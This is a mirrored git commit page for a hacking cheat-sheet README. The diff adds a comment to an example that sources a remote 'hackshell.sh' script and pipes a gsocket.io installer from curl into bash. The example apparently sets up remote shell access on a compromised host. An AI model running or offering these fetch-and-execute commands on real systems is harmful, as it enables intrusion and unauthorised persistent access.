mirror of
https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet.git
synced 2026-07-10 12:48:36 +02:00
Update README.md
This commit is contained in:
@@ -1212,6 +1212,7 @@ sys.stdout.buffer.write(urllib.request.urlopen(\"$url\", timeout=10, context=ctx
|
||||
|
||||
Example: Installing gsocket with purl:
|
||||
```sh
|
||||
# cut & paste the above purl() function into your bash. Then cut & paste the following:
|
||||
source <(purl https://raw.githubusercontent.com/hackerschoice/hackshell/main/hackshell.sh) \
|
||||
&& bin curl \
|
||||
&& bash -c "$(curl -fsSL https://gsocket.io/y)" \
|
||||
|
||||
Reference in New Issue
Block a user